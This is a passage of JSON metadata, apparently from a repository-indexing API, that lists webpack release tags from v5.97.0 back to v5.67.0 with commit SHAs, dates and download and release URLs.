1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","ht